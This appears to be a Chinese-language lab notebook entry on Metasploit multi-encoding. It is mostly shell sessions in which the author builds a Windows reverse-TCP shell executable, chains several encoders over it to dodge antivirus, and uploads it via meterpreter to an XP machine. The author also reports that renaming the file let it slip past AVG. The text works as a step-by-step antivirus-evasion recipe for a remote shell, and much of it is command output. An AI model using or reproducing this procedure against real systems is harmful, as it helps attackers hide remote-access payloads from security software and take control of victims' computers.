metasploit多重编码

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/alpha_upper succeeded with size 967 (iteration=1)

[*] x86/alpha_upper succeeded with size 2003 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2032 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 2061 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2090 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2119 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2148 (iteration=5)

[*] x86/countdown succeeded with size 2166 (iteration=1)

[*] x86/countdown succeeded with size 2184 (iteration=2)

[*] x86/countdown succeeded with size 2202 (iteration=3)

[*] x86/countdown succeeded with size 2220 (iteration=4)

[*] x86/countdown succeeded with size 2238 (iteration=5)

root@bt:~# ls
Desktop  payload1.exe  payload2.exe  payload3.exe
root@bt:~# file payload3.exe 
payload3.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:~# 

生成payload3.exe花了很长时间，大概有半个小时，可能是因为虚拟机，内存只有512MB的缘故。

然后，上传到XP，也还是会报威胁：

meterpreter > upload payload3.exe
[*] uploading  : payload3.exe -> payload3.exe
[*] uploaded   : payload3.exe -> payload3.exe
meterpreter >

书上写的是成功躲过了杀毒软件，但是，我这里，还是报告威胁了，可能因为杀毒软件比较新吧。

后来，我第二次，生成那个payload.exe，就比较快了，不知道为什么。

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload_time.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/alpha_upper succeeded with size 966 (iteration=1)

[*] x86/alpha_upper succeeded with size 2000 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)

[*] x86/countdown succeeded with size 2163 (iteration=1)

[*] x86/countdown succeeded with size 2181 (iteration=2)

[*] x86/countdown succeeded with size 2199 (iteration=3)

[*] x86/countdown succeeded with size 2217 (iteration=4)

[*] x86/countdown succeeded with size 2235 (iteration=5)


real    1m34.085s
user    0m50.987s
sys     0m40.059s
root@bt:~# 

但是，在XP里，还是报威胁。

再后来，我想，是不是因为exe文件名的问题，所以，生成了一个很正常的名字readme.exe，这次，竟然躲过了avg杀毒软件的查杀。

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)

[*] x86/alpha_upper succeeded with size 966 (iteration=1)

[*] x86/alpha_upper succeeded with size 2000 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)

[*] x86/countdown succeeded with size 2163 (iteration=1)

[*] x86/countdown succeeded with size 2181 (iteration=2)

[*] x86/countdown succeeded with size 2199 (iteration=3)

[*] x86/countdown succeeded with size 2217 (iteration=4)

[*] x86/countdown succeeded with size 2235 (iteration=5)


real    1m33.468s
user    0m52.195s
sys     0m39.830s
root@bt:~# 

meterpreter > upload read.exe
[*] uploading  : read.exe -> read.exe
[*] uploaded   : read.exe -> read.exe
meterpreter >